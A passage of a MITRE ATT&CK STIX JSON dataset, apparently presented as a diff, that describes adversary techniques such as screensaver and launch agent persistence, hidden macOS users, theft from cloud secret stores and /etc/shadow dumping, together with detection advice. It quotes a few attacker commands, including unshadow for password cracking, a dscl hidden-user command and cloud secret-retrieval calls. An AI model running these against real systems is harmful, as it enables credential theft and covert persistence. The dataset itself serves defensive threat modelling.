(PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Bartosz Jerzman" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", + "created": "2020-01-24T13:51:01.210Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/002", + "external_id": "T1546.002" + }, + { + "source_name": "ESET Gazer Aug 2017", + "description": "ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf" + }, + { + "source_name": "Wikipedia Screensaver", + "description": "Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.", + "url": "https://en.wikipedia.org/wiki/Screensaver" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Hidden Users", + "description": "Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: sudo dscl . -create /Users/username UniqueID 401 (Citation: Cybereason OSX Pirrit).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1147", + "external_id": "T1147" + }, + { + "source_name": "Cybereason OSX Pirrit", + "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.", + "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-18T20:53:46.175Z", + "name": "Conditional Access Policies", + "description": "Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. \n\nBy modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Gavin Knapp", + "Joshua Penny" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "SaaS", + "IaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae", + "created": "2024-01-02T13:43:37.389Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/009", + "external_id": "T1556.009" + }, + { + "source_name": "AWS IAM Conditions", + "description": "AWS. (n.d.). IAM JSON policy elements: Condition. Retrieved January 2, 2024.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition.html" + }, + { + "source_name": "GCP IAM Conditions", + "description": "Google Cloud. (n.d.). Overview of IAM Conditions. Retrieved January 2, 2024.", + "url": "https://cloud.google.com/iam/docs/conditions-overview" + }, + { + "source_name": "JumpCloud Conditional Access Policies", + "description": "JumpCloud. (n.d.). Get Started: Conditional Access Policies. Retrieved January 2, 2024.", + "url": "https://jumpcloud.com/support/get-started-conditional-access-policies" + }, + { + "source_name": "Microsoft Conditional Access", + "description": "Microsoft. (2023, November 15). What is Conditional Access?. Retrieved January 2, 2024.", + "url": "https://learn.microsoft.com/en-us/entra/identity/conditional-access/overview" + }, + { + "source_name": "Okta Conditional Access Policies", + "description": "Okta. (2023, November 30). Conditional Access Based on Device Security Posture. Retrieved January 2, 2024.", + "url": "https://support.okta.com/help/s/article/Conditional-access-based-on-device-security-posture?language=en_US" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Create Cloud Instance", + "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", + "created": "2020-05-14T14:45:15.978Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1578/002", + "external_id": "T1578.002" + }, + { + "source_name": "Mandiant M-Trends 2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020" + }, + { + "source_name": "AWS CloudTrail Search", + "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.", + "url": "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/" + }, + { + "source_name": "Azure Activity Logs", + "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.", + "url": "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs" + }, + { + "source_name": "Cloud Audit Logs", + "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020.", + "url": "https://cloud.google.com/logging/docs/audit#admin-activity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Compile After Delivery", + "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank", + "Praetorian" + ], + "x_mitre_detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Static File Analysis", + "Binary Analysis", + "Anti-virus", + "Host intrusion prevention systems", + "Signature-based detection" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_system_requirements": [ + "Compiler software (either native to the system or delivered by the adversary)" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cf7b3a06-8b42-4c33-bbe9-012120027925", + "created": "2019-04-25T20:53:07.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1500", + "external_id": "T1500" + }, + { + "source_name": "ClearSky MuddyWater Nov 2018", + "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.", + "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf" + }, + { + "source_name": "TrendMicro WindowsAppMac", + "description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-30T20:24:19.357Z", + "name": "Cloud Secrets Management Stores", + "description": "Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. \n\nSecrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables. \n\nIf an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)\n\n**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Martin McCloskey, Datadog" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561", + "created": "2023-09-25T12:41:26.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1555/006", + "external_id": "T1555.006" + }, + { + "source_name": "Sysdig ScarletEel 2.0 2023", + "description": "Alessandro Brucato. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved September 25, 2023.", + "url": "https://sysdig.com/blog/scarleteel-2-0/" + }, + { + "source_name": "AWS Secrets Manager", + "description": "AWS. (n.d.). Retrieve secrets from AWS Secrets Manager. Retrieved September 25, 2023.", + "url": "https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html" + }, + { + "source_name": "Google Cloud Secrets", + "description": "Google Cloud. (n.d.). List secrets and view secret details. Retrieved September 25, 2023.", + "url": "https://cloud.google.com/secret-manager/docs/view-secret-details" + }, + { + "source_name": "Permiso Scattered Spider 2023", + "description": "Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.", + "url": "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud" + }, + { + "source_name": "Microsoft Azure Key Vault", + "description": "Microsoft. (2023, January 13). Quickstart: Set and retrieve a secret from Azure Key Vault using Azure CLI. Retrieved September 25, 2023.", + "url": "https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-05-13T23:51:22.625Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation) \n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. (Citation: The MITRE Corporation)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "ics-privesc" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "x_mitre_effective_permissions": [], + "x_mitre_permissions_required": [], + "x_mitre_system_requirements": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0890", + "external_id": "T0890" + }, + { + "source_name": "The MITRE Corporation", + "description": "The MITRE Corporation The MITRE Corporation ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ATT&CK T1068: Exploitation for Privilege Escalation Retrieved. 2021/04/12 ", + "url": "https://attack.mitre.org/techniques/T1068/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-18T22:44:01.723Z", + "name": "Code Repositories", + "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)\n\n**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Itamar Mizrahi, Cymptom", + "Toby Kohlenberg", + "Josh Liburdi, @jshlbrd" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "SaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3", + "created": "2021-05-11T18:51:16.343Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1213/003", + "external_id": "T1213.003" + }, + { + "source_name": "Wired Uber Breach", + "description": "Andy Greenberg. (2017, January 21). Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach. Retrieved May 14, 2021.", + "url": "https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/" + }, + { + "source_name": "Krebs Adobe", + "description": "Brian Krebs. (2013, October 3). Adobe To Announce Source Code, Customer Data Breach. Retrieved May 17, 2021.", + "url": "https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Transmitted Data Manipulation", + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "created": "2020-03-02T14:27:00.693Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1565/002", + "external_id": "T1565.002" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download" + }, + { + "source_name": "FireEye APT38 Oct 2018", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "/etc/passwd and /etc/shadow", + "description": "Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)\n\nThe Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", + "created": "2020-02-11T18:46:56.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003/008", + "external_id": "T1003.008" + }, + { + "source_name": "Linux Password and Shadow File Formats", + "description": "The Linux Documentation Project. (n.d.). Linux Password and Shadow File Formats. Retrieved February 19, 2020.", + "url": "https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html" + }, + { + "source_name": "nixCraft - John the Ripper", + "description": "Vivek Gite. (2014, September 17). Linux Password Cracking: Explain unshadow and john Commands (John the Ripper Tool). Retrieved February 19, 2020.", + "url": "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Launch Agent", + "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Antonio Piazza, @antman1p" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\n\nEnsure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", + "created": "2020-01-17T16:10:58.592Z", + "created_by_ref": 